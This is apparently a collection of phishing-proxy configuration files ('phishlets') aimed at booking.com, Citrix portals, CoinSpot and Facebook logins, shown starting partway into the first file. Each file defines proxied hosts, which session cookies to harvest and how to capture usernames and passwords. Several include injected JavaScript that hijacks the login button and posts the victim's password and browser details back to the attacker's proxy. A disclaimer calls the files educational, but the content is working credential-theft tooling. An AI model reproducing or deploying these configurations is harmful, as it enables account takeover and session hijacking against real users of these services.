33 |   - {triggers_on: 'account.booking.com', orig_sub: '', domain: 'booking.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
34 |   - {triggers_on: 'account.booking.com', orig_sub: '', domain: 'booking.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
35 |   - {triggers_on: 'account.booking.com', orig_sub: '', domain: 'booking.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
36 | 
37 |   - {triggers_on: 'account.booking.com', orig_sub: 'q-cf', domain: 'bstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
38 |   - {triggers_on: 'account.booking.com', orig_sub: 'q-cf', domain: 'bstatic.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
39 |   - {triggers_on: 'account.booking.com', orig_sub: 'q-cf', domain: 'bstatic.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
40 | 
41 | auth_tokens:
42 |   - domain: '.booking.com'
43 |     keys: ['bkng_sso_session','.*,regexp']
44 | 
45 | credentials:
46 |   username:
47 |     key: 'Email'
48 |     search: '(.*)'
49 |     type: 'post'
50 |   password:
51 |     key: 'Password'
52 |     search: '(.*)'
53 |     type: 'post'
54 | 
55 | login:
56 |   domain: 'account.booking.com'
57 |   path: '/sign-in'
58 | 
59 | js_inject:
60 |   - trigger_domains: ["account.booking.com"]
61 |     trigger_paths: ["/sign-in"]
62 |     trigger_params: []
63 |     script: |
64 |       function lp(){
65 |         var submit = document.querySelectorAll('button[type=button]')[4];
66 |         submit.setAttribute("onclick", "sendData()");
67 |         return;
68 |       }
69 |       function sendData(){
70 |         var email = document.getElementsByName("username")[0].value;
71 |         var password = document.getElementsByName("password")[0].value;
72 |         var xhr2 = new XMLHttpRequest();
73 |         xhr2.open("POST", '/', true);
74 |         xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
75 |         xhr2.send("Email="+encodeURIComponent(email));
76 |         var xhr = new XMLHttpRequest();
77 |         xhr.open("POST", '/', true);
78 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
79 |         xhr.send("Password="+encodeURIComponent(password));
80 |         return;
81 |       }
82 |       setTimeout(function(){ lp(); }, 2500);
83 |       


--------------------------------------------------------------------------------
/citrix.yaml:
--------------------------------------------------------------------------------
 1 | name: 'Citrix Portal'
 2 | author: '@424f424f'
 3 | min_ver: '2.3.0'
 4 | proxy_hosts:
 5 |   - {phish_sub: 'subdomainhere', orig_sub: 'subdomainhere', domain: 'domainhere', session: true, is_landing: true}
 6 | sub_filters:
 7 |   - {triggers_on: 'domainhere', orig_sub: 'subdomainhere', domain: 'domainhere', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
 8 | auth_tokens:
 9 |   - domain: 'domainhere'
10 |     keys: ['ASP.NET_SessionId','CsrfToken','NSC_AAAC','NSC_DLGE','pwcount']
11 | credentials:
12 |   username:
13 |     key: 'login'
14 |     search: '(.*)'
15 |     type: 'post'
16 |   password:
17 |     key: 'passwd'
18 |     search: '(.*)'
19 |     type: 'post'
20 | login:
21 |   domain: 'subdomainhere.domainhere'
22 |   path: '/vpn/index.html'
23 | 


--------------------------------------------------------------------------------
/coinspot.yaml:
--------------------------------------------------------------------------------
 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
 2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
 3 | 
 4 | author: '@AN0NUD4Y'
 5 | min_ver: '2.3.0'
 6 | proxy_hosts:
 7 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'coinspot.com.au', session: true, is_landing: true}
 8 |   - {phish_sub: '', orig_sub: 'www', domain: 'gstatic.com', session: true, is_landing: false}
 9 | 
10 |   
11 | sub_filters:
12 |   - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: 'window.location.href', replace: '"https://www.coinspot.com.au/login"', mimes: ['text/html', 'application/javascript', 'application/x-javascript', 'text/javascript']}
13 |   - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: 'window.location.href', replace: '"https://www.coinspot.com.au/login"', mimes: ['text/html', 'application/javascript', 'application/x-javascript', 'text/javascript']}
14 |   
15 |   - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'coinspot.com.au', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
16 |   - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'coinspot.com.au', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
17 |   - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'coinspot.com.au', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
18 |   - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
19 |   - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
20 |   - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
21 |   - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
22 |   - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
23 |   - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
24 | 
25 | auth_tokens:
26 |   - domain: '.coinspot.com.au'
27 |     keys: ['.*,regexp']
28 | credentials:
29 |   username:
30 |     key: 'login'
31 |     search: '(.*)'
32 |     type: 'post'
33 |   password:
34 |     key: 'password'
35 |     search: '(.*)'
36 |     type: 'post'
37 | login:
38 |   domain: 'www.coinspot.com.au'
39 |   path: '/'


--------------------------------------------------------------------------------
/facebook-d.yaml:
--------------------------------------------------------------------------------
 1 | author: '@An0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false}
 6 |   - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false}
 7 | sub_filters:
 8 |   - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
 9 |   - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
10 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
11 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
12 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
13 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
14 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
15 |   - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']}
16 | 
17 | auth_tokens:
18 |   - domain: '.facebook.com'
19 |     keys: ['c_user','xs','sb']
20 | credentials:
21 |   username:
22 |     key: 'email'
23 |     search: '(.*)'
24 |     type: 'post'
25 |   password:
26 |     key: 'unenc_password'
27 |     search: '(.*)'
28 |     type: 'post'
29 |   custom: 
30 |     - key: 'UserAgent'
31 |       search: '(.*)'
32 |       type: 'post'
33 |     - key: 'Browser'
34 |       search: '(.*)'
35 |       type: 'post'
36 |     - key: 'Engine'
37 |       search: '(.*)'
38 |       type: 'post'
39 |     - key: 'Platform'
40 |       search: '(.*)'
41 |       type: 'post'
42 | 
43 |    
44 | login:
45 |   domain: 'www.facebook.com'
46 |   path: '/login.php'
47 | 
48 | js_inject:
49 |   - trigger_domains: ["www.facebook.com"]
50 |     trigger_paths: ["/login","/login.php", "/login/device-based/regular/login/", "/login/*"]
51 |     trigger_params: []
52 |     script: |  
53 |      function onclickListener(){
54 |         var submit = document.querySelectorAll('button[type=submit]')[0];
55 |         var submitmobile = document.getElementById('u_0_5');
56 |         var submitbuttonmobile = document.querySelectorAll('button[type=button]')[0];
57 |         submit.setAttribute("onclick", "sendPass()");
58 |         submitmobile.setAttribute("onclick", "sendPass()");
59 |         submitbuttonmobile.setAttribute("onclick", "sendPass()");
60 |       return;
61 |       }
62 |      function sendPass(){
63 |       var password = document.getElementsByName("pass")[0].value;
64 |       var xhr = new XMLHttpRequest();
65 |       xhr.open("POST", '/login/device-based/regular/login/', true);
66 |       xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
67 |       xhr.send("unenc_password="+encodeURIComponent(password));
68 |       var xhr1 = new XMLHttpRequest();
69 |       var useragent = navigator.userAgent;
70 |       xhr1.open("POST", '/', true);
71 |       xhr1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
72 |       var xhr2 = new XMLHttpRequest();
73 |       var browser = navigator.appName;
74 |       xhr2.open("POST", '/', true);
75 |       xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
76 |       xhr2.send("Browser="+encodeURIComponent(browser));
77 |       var xhr3 = new XMLHttpRequest();
78 |       var engine = navigator.product;
79 |       xhr3.open("POST", '/', true);
80 |       xhr3.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
81 |       xhr3.send("Engine="+encodeURIComponent(engine));
82 |       var xhr4 = new XMLHttpRequest();
83 |       var platform = navigator.platform;
84 |       xhr4.open("POST", '/', true);
85 |       xhr4.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
86 |       xhr4.send("Platform="+encodeURIComponent(platform));
87 |       return;
88 |       }
89 |       setTimeout(function(){ onclickListener(); }, 2500);
90 | 


--------------------------------------------------------------------------------
/facebook-d2.yaml:
--------------------------------------------------------------------------------
 1 | author: '@An0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false}
 6 |   - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false}
 7 | sub_filters:
 8 |   - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
 9 |   - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
10 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
11 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
12 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
13 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
14 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
15 |   - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']}
16 | 
17 | auth_tokens:
18 |   - domain: '.facebook.com'
19 |     keys: ['c_user','xs','sb']
20 | credentials:
21 |   username:
22 |     key: 'email'
23 |     search: '(.*)'
24 |     type: 'post'
25 |   password:
26 |     key: 'unenc_password'
27 |     search: '(.*)'
28 |     type: 'post'
29 |   custom: 
30 |     - key: 'UserAgent'
31 |       search: '(.*)'
32 |       type: 'post'
33 |     - key: 'Browser'
34 |       search: '(.*)'
35 |       type: 'post'
36 |     - key: 'Engine'
37 |       search: '(.*)'
38 |       type: 'post'
39 |     - key: 'Platform'
40 |       search: '(.*)'
41 |       type: 'post'
42 | 
43 |    
44 | login:
45 |   domain: 'www.facebook.com'
46 |   path: '/login.php'
47 | 
48 | js_inject:
49 |   - trigger_domains: ["www.facebook.com"]
50 |     trigger_paths: ["/login","/login.php", "/login/device-based/regular/login/", "/login/*"]
51 |     trigger_params: []
52 |     script: |  
53 |      function onclickListener(){
54 |       var submit = document.querySelectorAll('button[type=submit]')[0];
55 |       submit.setAttribute("onclick", "sendPass()");
56 |       return;
57 |       }
58 |      function sendPass(){
59 |       var password = document.getElementsByName("pass")[0].value;
60 |       var xhr = new XMLHttpRequest();
61 |       xhr.open("POST", '/login/device-based/regular/login/', true);
62 |       xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
63 |       xhr.send("unenc_password="+encodeURIComponent(password));
64 |       var xhr1 = new XMLHttpRequest();
65 |       var useragent = navigator.userAgent;
66 |       xhr1.open("POST", '/', true);
67 |       xhr1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
68 |       var xhr2 = new XMLHttpRequest();
69 |       var browser = navigator.appName;
70 |       xhr2.open("POST", '/', true);
71 |       xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
72 |       xhr2.send("Browser="+encodeURIComponent(browser));
73 |       var xhr3 = new XMLHttpRequest();
74 |       var engine = navigator.product;
75 |       xhr3.open("POST", '/', true);
76 |       xhr3.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
77 |       xhr3.send("Engine="+encodeURIComponent(engine));
78 |       var xhr4 = new XMLHttpRequest();
79 |       var platform = navigator.platform;
80 |       xhr4.open("POST", '/', true);
81 |       xhr4.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
82 |       xhr4.send("Platform="+encodeURIComponent(platform));
83 |       return;
84 |       }
85 |       setTimeout(function(){ onclickListener(); }, 2500);
86 | 


--------------------------------------------------------------------------------
/facebook-d3.yaml:
--------------------------------------------------------------------------------
 1 | author: '@An0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false}
 6 |   - {phish_sub: 'api', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false}
 7 | sub_filters:
 8 |   - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
 9 |   - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
10 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
11 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
12 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
13 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
14 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
15 |   - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']}
16 | 
17 | auth_tokens:
18 |   - domain: '.facebook.com'
19 |     keys: ['c_user','xs','sb']
20 | credentials:
21 |   username:
22 |     key: 'email'
23 |     search: '(.*)'
24 |     type: 'post'
25 |   password:
26 |     key: 'unenc_password'
27 |     search: '(.*)'
28 |     type: 'post'
29 | login:
30 |   domain: 'www.facebook.com'
31 |   path: '/login.php'
32 | 
33 | js_inject:
34 |   - trigger_domains: ["www.facebook.com"]
35 |     trigger_paths: ["/login","/login.php", "/login/device-based/regular/login/", "/login/*"]
36 |     trigger_params: []
37 |     script: |  
38 |      function onclickListener(){
39 |         var submit = document.querySelectorAll('button[type=submit]')[0];
40 |         var submitmobile = document.getElementById('u_0_5');
41 |         var submitbuttonmobile = document.querySelectorAll('button[type=button]')[0];
42 |         document.getElementsByTagName("button")[0].addEventListener("click", fclick);
43 |         submit.addEventListener("click", fclick);
44 |         submitmobile.addEventListener("click", fclick);
45 |         submitbuttonmobile.addEventListener("click", fclick);
46 |       return;
47 |       }
48 |       function fclick() {
49 |         function fcheck() {
50 |             if (JSON.parse(document.getElementsByName("pass")[0].value == "")) {
51 |                 setTimeout(fcheck, 100);
52 |             } else {
53 |                 var unenc_password = document.getElementsByName("pass")[0].value;
54 |                     var xhr = new XMLHttpRequest();
55 |                     xhr.open("POST", 'qwertyqwerty/', true);
56 |                     xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
57 |                     xhr.send("unenc_password=" + encodeURIComponent(unenc_password));
58 |                     console.log(unenc_password);
59 |         }
60 |         fcheck();
61 |         }
62 |       }
63 |       setTimeout(function(){ onclickListener(); }, 2500);


--------------------------------------------------------------------------------
/facebook-fix.yaml:
--------------------------------------------------------------------------------
 1 | author: '@charlesbel'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false}
 6 |   - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false}
 7 | sub_filters:
 8 |   - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
 9 |   - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
10 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
11 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
12 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
13 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
14 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
15 |   - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']}
16 | 
17 | auth_tokens:
18 |   - domain: '.facebook.com'
19 |     keys: ['c_user','xs','sb']
20 | credentials:
21 |   username:
22 |     key: 'email'
23 |     search: '(.*)'
24 |     type: 'post'
25 |   password:
26 |     key: 'unenc_password'
27 |     search: '(.*)'
28 |     type: 'post'
29 |   custom: 
30 |     - key: 'pass'
31 |       search: '(.*)'
32 |       type: 'post'
33 |     - key: 'Password'
34 |       search: '(.*)'
35 |       type: 'post'  
36 |     - key: 'UserAgent'
37 |       search: '(.*)'
38 |       type: 'post'
39 |     - key: 'Browser'
40 |       search: '(.*)'
41 |       type: 'post'
42 |     - key: 'Engine'
43 |       search: '(.*)'
44 |       type: 'post'
45 |     - key: 'Platform'
46 |       search: '(.*)'
47 |       type: 'post'
48 | 
49 |    
50 | login:
51 |   domain: 'www.facebook.com'
52 |   path: '/login.php'
53 | 
54 | js_inject:
55 |   - trigger_domains: ["www.facebook.com"]
56 |     trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"]
57 |     trigger_params: []
58 |     script: |  
59 |       function onclickListener(){
60 |         var submit = document.querySelectorAll('button[type=submit]')[0];
61 |         submit.setAttribute("onclick", "sendPass()");
62 |         var useragent = navigator.userAgent;
63 |         xhr.open("POST", '/', true);
64 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
65 |         xhr.send("UserAgent="+encodeURIComponent(useragent));
66 |         var browser = navigator.appName;
67 |         xhr.open("POST", '/', true);
68 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
69 |         xhr.send("Browser="+encodeURIComponent(browser));
70 |         var engine = navigator.product;
71 |         xhr.open("POST", '/', true);
72 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
73 |         xhr.send("Engine="+encodeURIComponent(engine));
74 |         var platform = navigator.platform;
75 |         var xhr = new XMLHttpRequest();
76 |         xhr.open("POST", '/', true);
77 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
78 |         xhr.send("Platform="+encodeURIComponent(platform));
79 |         return;
80 |       }
81 |       function sendPass(){
82 |         var password = document.getElementsByName("pass")[0].value;
83 |         var xhr = new XMLHttpRequest();
84 |         xhr.open("POST", '/login/device-based/regular/login/', true);
85 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
86 |         xhr.send("unenc_password="+encodeURIComponent(password));
87 |         return;
88 |       }
89 |       setTimeout(function(){ onclickListener(); }, 1000);
90 | 


--------------------------------------------------------------------------------
/facebook.yaml:
--------------------------------------------------------------------------------
  1 | author: '@An0nud4y'
  2 | min_ver: '2.3.0'
  3 | proxy_hosts:
  4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true}
  5 |   - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false}
  6 |   - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false}
  7 | sub_filters:
  8 |   - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
  9 |   - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
 10 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
 11 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
 12 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
 13 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
 14 |   - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
 15 |   - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']}
 16 | 
 17 | 
 18 | 
 19 | auth_tokens:
 20 |   - domain: '.facebook.com'
 21 |     keys: ['c_user','xs','sb']
 22 | credentials:
 23 |   username:
 24 |     key: 'email'
 25 |     search: '(.*)'
 26 |     type: 'post'
 27 |   password:
 28 |     key: '^unenc_password$'
 29 |     search: '(.*)'
 30 |     type: 'post'
 31 | #Custom parameters are added in order to grab the requests made by javascripts injected in order to get device user-agent and other details.
 32 | # key: 'pass'  is added in order to increase the chances of grabbing the pass field if in case failed from above.
 33 | 
 34 |   custom: 
 35 |     - key: '^pass$'
 36 |       search: '(.*)'
 37 |       type: 'post'
 38 |     - key: '^Password$'
 39 |       search: '(.*)'
 40 |       type: 'post'  
 41 |     - key: 'UserAgent'
 42 |       search: '(.*)'
 43 |       type: 'post'
 44 |     - key: 'Browser'
 45 |       search: '(.*)'
 46 |       type: 'post'
 47 |     - key: 'Engine'
 48 |       search: '(.*)'
 49 |       type: 'post'
 50 |     - key: 'Platform'
 51 |       search: '(.*)'
 52 |       type: 'post'
 53 | 
 54 | login:
 55 |   domain: 'www.facebook.com'
 56 |   path: '/login.php'
 57 | 
 58 | #Below Javascript function will do two things (1) on page load it will make 4 request back to server to let us capture the important data. (2) Will add a function to login button to leak the value of password field.
 59 | 
 60 | js_inject:
 61 |   - trigger_domains: ["www.facebook.com"]
 62 |     trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"] #The target path is important as the javascript will be injected in all address pages started with /login 
 63 |     trigger_params: []
 64 |     script: |  
 65 |       function onclickListener(){
 66 |         var submit = document.querySelectorAll('button[type=submit]')[0];
 67 |         submit.setAttribute("onclick", "sendPass()");
 68 |         
 69 |         var useragent = navigator.userAgent;
 70 |         xhr.open("POST", '/', true);
 71 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 72 |         xhr.send("UserAgent="+encodeURIComponent(useragent));
 73 |         
 74 |         var browser = navigator.appName;
 75 |         xhr.open("POST", '/', true);
